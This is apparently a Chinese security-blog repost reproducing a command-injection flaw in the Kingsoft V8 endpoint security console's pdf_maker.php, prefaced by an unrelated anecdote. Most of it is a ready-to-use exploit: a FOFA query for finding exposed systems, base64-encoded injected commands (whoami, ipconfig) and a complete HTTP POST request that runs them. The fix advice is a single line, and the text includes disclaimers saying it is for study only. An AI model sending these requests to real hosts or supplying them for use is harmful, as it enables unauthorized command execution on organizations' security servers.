“ 高中时我的一个哥们很喜欢一个女生,但是他十分腼腆,有她的电话都不敢打给她,毕业时我们寝室的哥几个怂恿他叫他表白,他打了一个电话给她,他结结巴巴的说出来自己好喜欢她,要唱首歌送给她,他很有感情的唱了这首歌,唱完后就哭了,问他为什么,他说她早就挂断了电话,原来他是对空气唱完这首歌的。”
导读
本文章仅用于交流学习,请勿使用该方法进行违法活动,谢谢!
漏洞描述
金山 V8 终端安全系统中的pdf_maker.php存在命令执行漏洞,由于没有过滤危险字符,导致构造特殊字符即可进行命令拼接执行任意命令
漏洞影响
金山 V8 终端安全系统漏洞复现
1)环境搭建(金山V8下载地址)
http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso2)或者FOFA语句
app="猎鹰安全-金山V8+终端安全系统"
3)登录界面
4)存在漏洞的文件为
KingsoftSecurity ManagerSystemCenterConsoleinterpdf_maker.php5)把要执行的命令进行拼接,然后再通过BP进行base64加密,即可执行任意命令
"|| whoami ||进行base64编码后为IiB8fCB3aG9hbWkgfHw=进行拼接url=IiB8fCB3aG9hbWkgfHw===&fileName=test //执行的时候=用%3D代替
6)构造数据包如下
POST /inter/pdf_maker.php HTTP/1.1Host: 127.0.0.1Content-Length: 45Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: PHPSESSID=noei1ghcv9rqgp58jf79991n04url=IiB8fCB3aG9hbWkgfHw%3D%3D%3D&fileName=MoBei
7)成功执行whoami命令
或者执行ipconfig
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
修护建议
升级到安全版本- - - - - - - - - - - - - - - END - - - - - - - - - - ----------
点关注,不迷路
觉得不错的帮忙点个“赞”,“在看” ~~~
原文始发于微信公众号(五六七安全团队):金山V8终端安全系统存在命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论